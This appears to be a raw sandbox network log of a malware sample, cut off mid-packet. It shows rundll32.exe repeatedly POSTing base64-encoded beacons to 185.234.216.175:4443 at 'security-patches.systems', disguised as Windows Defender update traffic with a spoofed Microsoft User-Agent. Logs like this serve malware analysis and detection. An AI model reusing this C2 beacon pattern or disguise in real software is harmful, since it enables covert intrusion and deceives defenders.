data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:29.095818043 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:28 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49838	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:29.382064104 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:30.838357925 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:30 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49840	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:31.098229885 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:32.558285952 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:32 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49846	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:32.975434065 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:34.432171106 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:34 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49852	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:34.694916010 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:36.283204079 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:35 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49857	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:36.557620049 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:38.027025938 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:37 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49863	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:38.285264969 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:39.717756033 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:39 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49866	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:39.974582911 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:41.433670044 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:41 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49871	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:41.697104931 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:43.141339064 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:42 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49877	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:43.410965919 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:44.877907038 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:44 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49881	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:45.150187969 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:46.593172073 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:46 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49885	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:46.870094061 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InIrMk53Y2s9IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
Dec 6, 2024 22:12:48.347084999 CET	218	IN	HTTP/1.1 200 OK Date: Fri, 06 Dec 2024 21:12:47 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 X-Powered-By: PHP/8.2.12 Content-Length: 20 Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d Data Ascii: eyJUUGQiOiJqY0tqIn0=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49890	185.234.216.175	4443	2412	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Dec 6, 2024 22:12:48.795141935 CET	461	OUT	POST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1 User-Agent: Microsoft-WNS/10.0 Host: security-patches.systems Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: fr-CA Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 49 72 4d 6b 35 33 59 32 73 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 